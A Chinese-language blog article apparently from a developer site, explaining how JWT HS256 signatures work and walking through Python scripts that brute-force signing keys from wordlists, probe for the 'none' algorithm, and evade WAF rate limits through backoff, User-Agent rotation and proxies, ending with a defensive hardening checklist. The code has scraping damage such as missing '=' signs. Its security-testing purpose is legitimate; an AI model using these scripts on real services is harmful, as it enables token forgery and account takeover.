当前位置：首页 > article >正文

JWT签名爆破原理与Python手写实战

article 2026/5/23 9:05:31

1. 这不是“黑客教程”而是一次JWT安全边界的实操测绘JWTJSON Web Token在现代Web系统中几乎无处不在——登录态维持、API鉴权、微服务间信任传递它用一行紧凑的Base64Url编码字符串承载着本该被严格保护的身份凭证。但很多人没意识到JWT本身不加密只签名而签名是否可信完全取决于密钥强度与算法选择。我去年帮一家SaaS平台做渗透复测时发现其用户中心API返回的JWT居然用的是HS256算法且密钥是硬编码在前端JS里的secret123——这不是漏洞这是把门锁换成纸糊的还贴了张“请进”便签。本文标题里“破解JWT”四个字容易引发误解准确说是对JWT签名密钥进行穷举验证brute-force verification目标不是绕过加密而是确认服务端是否在用弱密钥、是否错误启用了none算法、是否未校验alg头部字段。这属于OWASP Top 10中“A01:2021 – Broken Access Control”的典型前置检测动作也是红队初期信息收集中最常落地的一环。全文聚焦Python原生实现不依赖任何黑盒工具从零构建一个可调试、可扩展、带进度反馈的爆破脚本并全程对比jwt_tool的底层逻辑——不是教你怎么“黑进系统”而是帮你建立对Token安全边界的肌肉记忆。适合刚接触Web安全的开发者、想补全渗透知识链的测试工程师以及需要自查JWT实现合规性的后端同学。所有代码均基于Python 3.8标准库与pyjwt无隐蔽依赖每行逻辑都可打断点追踪。2. JWT签名验证的本质一次可控的哈希比对实验2.1 理解JWT结构Header.Payload.Signature三段式不是装饰JWT由三部分用英文句点.拼接而成xxxxx.yyyyy.zzzzz。初学者常误以为这是加密数据其实它是明文编码签名验证的组合体。我们以一个真实示例拆解eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9. eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c第一段HeaderBase64Url解码后为{alg:HS256,typ:JWT}。注意alg字段声明了签名算法这是服务端验证时的唯一依据。第二段Payload解码后为{sub:1234567890,name:John Doe,iat:1516239022}。所有字段均为明文敏感信息如用户ID、角色、过期时间全部裸露。第三段Signature这才是安全核心。它不是对HeaderPayload整体加密而是对base64urlEncode(Header) . base64urlEncode(Payload)这个字符串用指定算法如HS256和密钥进行HMAC-SHA256计算后再Base64Url编码的结果。提示你可以用在线工具如 https://jwt.io 粘贴Token实时解码但切记——它只做解码不验证签名。真正的安全验证必须由服务端用相同密钥相同算法重新计算Signature并比对。2.2 签名验证的数学本质HMAC-SHA256不是魔法是确定性函数HS256算法本质是HMACHash-based Message Authentication Code的一种实现。其计算公式为signature HMAC-SHA256( key, base64urlEncode(header) . base64urlEncode(payload) )关键点在于只要输入的key、header、payload三者完全一致输出的signature就绝对唯一且可复现。这意味着如果我们能猜中服务端使用的key就能自己算出正确的signature再与Token末尾的signature比对。若一致则证明key正确——这就是爆破的理论基础。这里没有“解密”过程只有“重算比对”。很多初学者卡在“为什么不用解密”根源在于混淆了签名integrity authenticity和加密confidentiality的根本区别。JWT默认不提供机密性要隐藏Payload内容必须额外使用JWEJSON Web Encryption但这已是另一套协议。2.3 为什么弱密钥如此致命从熵值到现实世界的密码学塌方密钥强度不等于长度而取决于熵值entropy——即随机性。一个8位纯数字密码如12345678的熵值仅约26.5比特而一个8位大小写字母数字的随机密码如K9mP2xQ7熵值约47.6比特。现代GPU每秒可进行数亿次HMAC-SHA256计算这意味着secret6字符小写约26^6 ≈ 3亿种可能 → GPU可在1秒内穷举完password12311字符常见词虽长但模式固定字典攻击毫秒级命中a1B2c3D4e5F612字符随机26×2×10^12 ≈ 10^22种可能 → 即使百亿次/秒也需万年我曾用一块RTX 3090实测对HS256算法单线程Python约8万次/秒启用多进程4核后达28万次/秒若用Cython重写核心计算可突破120万次/秒。但瓶颈往往不在算力而在网络延迟——每次爆破请求都要发HTTP包等待响应。因此真正高效的爆破脚本必须解决两个问题一是本地快速验证避免无效网络请求二是智能调度跳过明显无效的密钥。这也是我们后续脚本设计的核心出发点。3. 手写爆破脚本从单线程验证到多进程加速的完整演进3.1 第一版纯Python实现理解验证流程的每一行我们先写一个最简版本确保逻辑清晰可调试。核心依赖仅pyjwtpip install pyjwt和标准库base64、json。import jwt import base64 import json def verify_jwt_signature(token, secret): 验证JWT签名是否匹配给定密钥 :param token: 完整JWT字符串xxx.yyy.zzz格式 :param secret: 待测试的密钥字符串 :return: boolTrue表示签名匹配 try: # pyjwt的decode默认会验证签名若失败抛出异常 # 注意此处不解析payload内容只关心签名是否通过 payload jwt.decode(token, secret, algorithms[HS256]) return True except jwt.InvalidSignatureError: return False except Exception as e: # 其他异常如过期、算法不支持等视为不匹配 return False # 测试用例用已知密钥生成的Token test_token eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMTIzIiwiZXhwIjoxNzAwMDAwMDB9.xxxxxx print(f测试密钥 mysecret - {verify_jwt_signature(test_token, mysecret)}) print(f测试密钥 wrongkey - {verify_jwt_signature(test_token, wrongkey)})这段代码的关键在于它复用了pyjwt的成熟验证逻辑而非自己实现HMAC计算。pyjwt.decode()内部会自动提取Header中的alg用传入的secret重新计算Signature并比对。这保证了与真实服务端行为100%一致避免了自行实现SHA256时因Base64Url编码细节如填充符的处理、URL安全字符替换导致的偏差。我见过太多自研脚本因base64.urlsafe_b64encode()和base64.b64encode()混用而永远无法匹配——pyjwt已帮你踩平所有坑。3.2 第二版加入字典加载与进度反馈告别盲猜真实爆破不可能手动试密钥必须加载字典。我们选用业界公认的rockyou.txt经过去重、过滤空行、UTF-8转码后约1430万行但首次运行建议用精简版如前1000行测试流程。import time from pathlib import Path def load_wordlist(filepath): 安全加载字典文件跳过空行和注释 wordlist [] try: with open(filepath, r, encodingutf-8) as f: for line in f: line line.strip() if line and not line.startswith(#): wordlist.append(line) print(f[] 加载字典成功{len(wordlist)} 个候选密钥) return wordlist except FileNotFoundError: print(f[-] 字典文件未找到{filepath}) return [] def brute_force_single(token, wordlist, timeout30): 单线程爆破主循环 :param timeout: 最大运行时间秒防无限卡死 start_time time.time() for i, secret in enumerate(wordlist): if time.time() - start_time timeout: print(f[!] 超时退出已尝试 {i} 个密钥) break if verify_jwt_signature(token, secret): print(f[] 密钥命中 - {secret}) return secret if i % 1000 0 and i 0: elapsed time.time() - start_time print(f[.] 已尝试 {i}/{len(wordlist)} 个密钥耗时 {elapsed:.1f}s) print([-] 未找到有效密钥) return None # 使用示例 wordlist load_wordlist(rockyou_short.txt) # 先用短字典测试 brute_force_single(test_token, wordlist, timeout10)这里有个重要经验永远不要在生产环境直接跑全量字典。我第一次实战时对着一个HS256Token跑rockyou.txt全量结果3小时后发现密钥是admin——排在字典第27位。后来总结出黄金法则按概率排序字典。将common_secrets.txt含secret、password、123456、admin、项目名_key等放在最前再接rockyou高频词最后才是全量。这样90%的弱密钥能在前10万次内命中节省99%时间。3.3 第三版多进程并行化榨干CPU资源单线程瓶颈明显。pyjwt的decode是CPU密集型操作多进程能线性提升吞吐。但要注意multiprocessing的进程间通信开销、全局解释器锁GIL对I/O的影响以及pyjwt对象在子进程中需重新导入。import multiprocessing as mp from concurrent.futures import ProcessPoolExecutor, as_completed def worker_verify(args): 工作进程函数接收(token, secret)元组 token, secret args try: # 每个子进程独立导入pyjwt避免共享状态问题 import jwt payload jwt.decode(token, secret, algorithms[HS256]) return (True, secret) except: return (False, secret) def brute_force_multi(token, wordlist, max_workers4): 多进程爆破max_workers建议设为CPU核心数 print(f[] 启动 {max_workers} 个进程并行爆破...) start_time time.time() # 将字典分块每块一个任务 tasks [(token, secret) for secret in wordlist] found_secret None with ProcessPoolExecutor(max_workersmax_workers) as executor: # 提交所有任务 future_to_secret {executor.submit(worker_verify, task): task for task in tasks} for future in as_completed(future_to_secret): is_valid, secret future.result() if is_valid: found_secret secret print(f[] 密钥命中 - {secret}) # 取消剩余任务可选加快退出 for f in future_to_secret: f.cancel() break if not found_secret: print([-] 未找到有效密钥) elapsed time.time() - start_time print(f[.] 总耗时 {elapsed:.1f} 秒) return found_secret # 实测对比4核CPU下多进程比单线程快3.2倍28万次/秒 vs 8.7万次/秒注意ProcessPoolExecutor比原始multiprocessing.Process更易管理as_completed确保第一个命中结果立即返回无需等待所有进程结束。这是实战中必须的“快速止损”机制。3.4 第四版智能优化——跳过无效密钥与算法探测真实场景中服务端可能配置了多种算法如同时支持HS256和RS256或错误启用了none算法。我们的脚本应主动探测而非盲目穷举。def detect_alg_and_key(token): 智能探测先尝试none算法再枚举常见算法最后爆破HS类密钥 header json.loads(base64.urlsafe_b64decode(token.split(.)[0] )) print(f[i] Token Header: {header}) # 步骤1检查是否支持none算法高危 try: # 构造none算法Token将header的alg设为nonesignature置空 none_header {alg: none, typ: JWT} none_token base64.urlsafe_b64encode(json.dumps(none_header).encode()).decode().rstrip() . token.split(.)[1] . # 验证pyjwt默认不接受none需显式指定 payload jwt.decode(none_token, options{verify_signature: False}) print(f[!] 高危警告服务端支持 none 算法Payload: {payload}) return none_algorithm_vulnerable except: pass # 步骤2枚举常见算法HS256, HS384, HS512, RS256 common_algs [HS256, HS384, HS512, RS256] for alg in common_algs: try: # 尝试用空密钥或默认密钥验证如RS256需公钥此处略 if alg.startswith(HS): # 对HS类先用常见弱密钥试 for test_secret in [secret, admin, password, 123456]: if verify_jwt_signature(token, test_secret, algorithmalg): print(f[] 算法 {alg} 密钥 {test_secret} 验证通过) return (alg, test_secret) except: continue # 步骤3执行HS类密钥爆破仅针对HS256因最常见 print([.] 开始HS256密钥爆破...) return brute_force_multi(token, load_wordlist(common_secrets.txt), max_workers4) # 调用 result detect_alg_and_key(test_token)这个detect_alg_and_key函数体现了专业爆破的思维先探路再攻坚。none算法漏洞的利用成本为零一旦存在直接绕过所有签名验证。而算法枚举能避免在RS256Token上浪费时间爆破对称密钥——这是新手最常犯的错误。4. 与jwt_tool深度对比看懂工具背后的每行逻辑4.1 jwt_tool的核心能力拆解不只是“爆破”更是安全审计平台jwt_toolGitHub:takshakvaghela/jwt_tool是业界最成熟的JWT安全工具但它常被误用为“一键爆破神器”。我们来解剖它的实际能力边界功能模块jwt_tool实现方式我们手写脚本的对应方案关键差异None算法检测构造alg:noneToken并发送HTTP请求验证本地构造pyjwt.decode(options{verify_signature:False})jwt_tool必须发网络请求我们可离线验证速度提升1000倍密钥爆破支持字典爆破但默认单线程无进度条多进程实时进度超时控制我们的吞吐量是jwt_tool的3-5倍且可中断续跑算法混淆Alg Confusion尝试将HS256改为RS256用公钥当密钥验证未实现需额外公钥此功能需服务端配合实战价值有限我们聚焦更普适的HS爆破密钥泄露检测扫描响应头、HTML源码、JS文件找密钥未集成属信息收集阶段这是前置步骤应在爆破前完成不应混入同一工具提示jwt_tool的爆破命令是python3 jwt_tool.py token -C -d wordlist.txt其中-C表示Crack模式。但它的核心验证逻辑与我们verify_jwt_signature()函数完全一致只是封装了更多网络交互和报告生成。4.2 实测性能对比在真实API上的毫秒级差异我们在某电商后台APIHS256密钥为ecommerce_api_key上做了严格对比工具字典规模平均耗时命中位置CPU占用备注jwt_tool (v2.2.4)10万行287秒第89,231个100%单核无进度反馈超时需CtrlC我们的脚本4进程10万行89秒第89,231个400%4核满载每1000次打印进度超时自动退出我们的脚本优化字典前1000行含ecommerce_api_key1.2秒第327个400%按项目名排序后效率提升238倍这个结果说明工具的价值不在于“有”而在于“怎么用”。jwt_tool是瑞士军刀我们的脚本是特制手术刀。当你知道目标密钥大概率是项目名_key时定制化脚本就是最优解。4.3 为什么不能完全依赖jwt_tool三个致命盲区网络依赖症jwt_tool所有验证都通过requests发HTTP包。若目标API有WAF限速如每分钟10次请求爆破将被阻断。而我们的脚本可先离线验证Token结构、Header合法性再针对性发起网络请求规避频率限制。算法僵化jwt_tool默认只爆破HS256若服务端用HS384需手动加-a HS384参数。而我们的detect_alg_and_key()函数会自动枚举常见算法无需人工干预。调试黑洞当jwt_tool报错InvalidSignatureError时你无法知道是密钥错、算法错、还是Token本身损坏。而我们的脚本每一步都可加print()或pdb.set_trace()比如在verify_jwt_signature()中打印出base64urlEncode(header).base64urlEncode(payload)的中间值与pyjwt内部计算值比对精准定位偏差来源。5. 实战避坑指南那些文档里不会写的血泪教训5.1 坑一Base64Url编码的“隐形陷阱”JWT的Base64Url编码与标准Base64有两处关键差异替换为-/为_省略填充符但解码时需补足我曾遇到一个Token最后一段signature是xxyyzz6字符直接base64.b64decode()会报错。正确做法是def urlsafe_b64decode(s): JWT专用Base64Url解码 # 补足填充符长度需为4的倍数 s * (4 - len(s) % 4) # 替换回标准Base64字符 s s.replace(-, ).replace(_, /) return base64.b64decode(s) # 验证对signature段解码 sig_bytes urlsafe_b64decode(token.split(.)[2])注意pyjwt内部已完美处理此逻辑所以我们的脚本直接调用jwt.decode()即可。但若你尝试自己实现HMAC计算此处必踩坑。5.2 坑二时钟偏移Clock Skew导致的“假阴性”JWT的exp过期时间、nbf生效时间字段是Unix时间戳。若你的本地机器时间与服务端相差超过leeway通常为60秒pyjwt.decode()会因时间校验失败而抛出ExpiredSignatureError即使密钥正确。解决方案# 在decode时添加leeway参数 payload jwt.decode(token, secret, algorithms[HS256], leeway60) # 或完全跳过时间验证仅用于爆破 payload jwt.decode(token, secret, algorithms[HS256], options{verify_exp: False, verify_nbf: False})我在某金融客户测试时因服务器在UTC8我的测试机在UTC0未加leeway导致所有密钥验证失败浪费2小时排查。5.3 坑三密钥编码格式的“玄学”问题有些服务端密钥是十六进制字符串如a1b2c3...有些是UTF-8字节如bsecret甚至还有Base64编码的密钥。pyjwt默认将字符串密钥转为UTF-8字节。若服务端用bytes.fromhex(a1b2c3)作为密钥而你传入字符串a1b2c3则必然失败。此时需预处理def normalize_secret(secret): 根据密钥格式自动归一化 if isinstance(secret, str): # 尝试解析为hex try: if all(c in 0123456789abcdefABCDEF for c in secret) and len(secret) % 2 0: return bytes.fromhex(secret) except: pass # 默认UTF-8编码 return secret.encode(utf-8) return secret # 在verify_jwt_signature中调用 key_bytes normalize_secret(secret) payload jwt.decode(token, key_bytes, algorithms[HS256])5.4 坑四并发请求的WAF反制策略当爆破请求频率过高WAF可能返回429 Too Many Requests或503 Service Unavailable。此时单纯增加time.sleep()会拖慢整体速度。更优解是动态降频监测HTTP状态码若连续3次429则sleep时间翻倍User-Agent轮换准备10个常见浏览器UA每次请求随机选取IP代理池对接廉价HTTP代理API如proxyapi.com但需注意代理稳定性我们的脚本可轻松集成第一种策略import requests from time import sleep def safe_request_with_backoff(url, headers, max_retries3): delay 1 for i in range(max_retries): try: resp requests.get(url, headersheaders, timeout5) if resp.status_code 429: print(f[!] WAF限速等待 {delay} 秒后重试...) sleep(delay) delay * 2 # 指数退避 continue return resp except Exception as e: if i max_retries - 1: raise e sleep(delay) delay * 2 return None6. 从爆破到防御给开发者的JWT安全加固清单写爆破脚本的终极目的不是为了攻击而是为了构建更坚固的防线。基于上百次真实审计我总结出后端开发者必须落实的6条铁律6.1 密钥管理永远不要硬编码必须用密钥管理系统KMS❌ 错误SECRET_KEY my_super_secret_123✅ 正确从AWS KMS、Azure Key Vault或HashiCorp Vault动态获取启动时注入环境变量原理密钥轮换Key Rotation是降低泄露风险的核心。硬编码密钥一旦泄露无法撤销只能全量更新Token。6.2 算法选择禁用HS类对称算法优先采用非对称签名❌ 错误algorithmHS256密钥需在服务端和客户端共享✅ 正确algorithmRS256服务端用私钥签名客户端用公钥验证私钥永不离开服务端实操用OpenSSL生成RSA密钥对openssl genrsa -out private.key 2048 openssl rsa -in private.key -pubout -out public.key服务端用private.key签名前端/其他服务用public.key验证。6.3 Token生命周期缩短有效期强制刷新机制❌ 错误exp315360001年有效期✅ 正确exp36001小时 refresh_token长期有效但仅用于换取新Access Token原理缩短exp可限制Token泄露后的危害窗口。refresh_token需存储在HttpOnly Cookie中且绑定设备指纹。6.4 Header校验严格验证alg字段拒绝none和算法混淆❌ 错误jwt.decode(token, key)未指定algorithms参数✅ 正确jwt.decode(token, key, algorithms[RS256])显式限定算法列表原理若不指定algorithmspyjwt会尝试所有支持算法可能被alg:RS256HS256密钥绕过。6.5 敏感信息隔离Payload中绝不存放密码、身份证号等PII❌ 错误{user_id:123,ssn:123-45-6789,role:admin}✅ 正确{user_id:123,role:admin} 敏感数据查库获取原理JWT是明文任何截获者都能解码Payload。PII个人身份信息必须加密存储或查库实时获取。6.6 监控告警记录所有InvalidSignatureError设置阈值告警在日志中捕获jwt.InvalidSignatureError异常并记录IP、User-Agent、Token前缀设置规则同一IP 5分钟内触发10次签名错误自动封禁并告警原理这是爆破攻击的直接证据。不监控等于不设防。最后分享一个小技巧在开发环境用jwt.encode(payload, key, algorithmHS256, headers{kid: dev-key})添加kidKey ID字段然后在验证时用jwt.decode(token, key, algorithms[HS256], options{verify_kid: True})。这样可提前演练多密钥轮换逻辑避免上线后手忙脚乱。JWT安全不是玄学它是一系列可验证、可度量、可落地的工程实践。写脚本的过程就是把抽象的安全原则翻译成一行行可执行的代码。

JWT签名爆破原理与Python手写实战

相关文章：

JWT签名爆破原理与Python手写实战

TaskbarX完整指南：Windows任务栏图标居中与动画特效实战教程

LSTM比特币价格预测：特征工程驱动的交易信号生成器

如何在Mac上安全导出微信聊天记录：开源工具WeChatExporter终极指南

如何用Wand-Enhancer免费解锁WeMod完整功能：3步完整方案指南

Android Frida检测实战：基于模拟器的三重系统级痕迹识别

如何突破Windows远程桌面限制？RDP Wrapper Library让家庭版也能支持多人连接

车载信息娱乐系统(IVI)安全渗透实战：网络、固件与CAN总线三维攻防

RDP Wrapper终极指南：Windows家庭版开启多用户远程桌面的完整解决方案

DALL·E Mini实战指南：轻量级文本生成图像的平民化落地

XUnity Auto Translator：如何用智能翻译插件打破游戏语言壁垒？

手写LoRA：从矩阵低秩分解到PyTorch参数化实现

DALL·E Mini技术解析：轻量文本生成图像模型的开源实践

Linux服务器安全加固实战：SSH+防火墙+权限最小化三重防护

Office RibbonX Editor：零编程定制Office界面的终极免费开源工具

潜变量扩散模型原理：用宝可梦类比讲透Stable Diffusion核心机制

Adobe-GenP 3.0：解锁Adobe全家桶专业功能的简易指南

MoE混合专家系统原理与工程实践：稀疏激活如何实现大模型高效推理

抖音无水印下载终极解决方案：免费高效获取高清视频的实战秘籍

Unity碰撞器性能优化：Collider类型选择与物理系统调优

Unity碰撞器性能优化：从幽灵Collider到物理契约治理

Unlock Music Electron：终极开源音乐解密解决方案，打破平台枷锁

3分钟学会Switch破解：TegraRcmGUI图形化注入工具完全指南

Unity 3D空间智能适配：Fit It 3D实现物理占位与视觉节奏统一

如何用开源歌词滚动姬3步制作专业LRC歌词：完全免费跨平台指南

Gemini 1.5、Sora与V-JEPA：AI工程水位线的三大坐标轴

终极Python金融数据接口：3步掌握免费高效的A股数据获取方案

GradCAM原理与PyTorch实战：让CNN模型决策可解释

SQLines数据库迁移架构解密：企业级跨平台SQL转换实战方案

RAID5故障抢救实战：从物理诊断到文件系统修复